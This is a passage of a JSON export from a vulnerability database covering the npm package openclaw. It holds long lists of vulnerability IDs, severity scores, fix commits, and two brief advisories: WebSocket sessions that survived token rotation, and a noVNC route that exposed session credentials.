                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "GHSA-g8mc-c5f2-mqg7"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nszj-2u6y-xqcb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89492?format=api",
            "vulnerability_id": "VCID-ntwt-jkgr-sffu",
            "summary": "OpenClaw: Existing WS sessions survive shared gateway token rotation\n## Impact\n\nExisting WS sessions survive shared gateway token rotation.\n\nRotating the shared gateway token did not disconnect existing shared-token WebSocket sessions.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42421",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10417",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10395",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10436",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42421"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3f-885m-v22w",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:15:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3f-885m-v22w"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42421",
                    "reference_id": "CVE-2026-42421",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42421"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5h3f-885m-v22w",
                    "reference_id": "GHSA-5h3f-885m-v22w",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-5h3f-885m-v22w"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-websocket-session-persistence-via-shared-gateway-token-rotation",
                    "reference_id": "openclaw-websocket-session-persistence-via-shared-gateway-token-rotation",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:15:14Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-websocket-session-persistence-via-shared-gateway-token-rotation"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42421",
                "GHSA-5h3f-885m-v22w"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ntwt-jkgr-sffu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89684?format=api",
            "vulnerability_id": "VCID-nv6g-7gs9-pfan",
            "summary": "OpenClaw: Sandbox noVNC helper route exposed interactive browser session credentials\n## Summary\n\nSandbox noVNC helper route exposed interactive browser session credentials.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.21 < 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe sandbox noVNC helper route could be reached without the intended bridge authentication, exposing an interactive browser session surface.\n\n## Technical Details\n\nThe fix gates the sandbox noVNC helper route behind bridge authentication.\n\n## Fix\n\nThe issue was fixed in #63882. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `8dfbf3268bd224b7377d1ecca77a445100746085`\n- PR: #63882\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/8dfbf3268bd224b7377d1ecca77a445100746085",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/8dfbf3268bd224b7377d1ecca77a445100746085"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/63882",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/63882"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-92jp-89mq-4374",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-92jp-89mq-4374"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-92jp-89mq-4374",
                    "reference_id": "GHSA-92jp-89mq-4374",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-92jp-89mq-4374"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
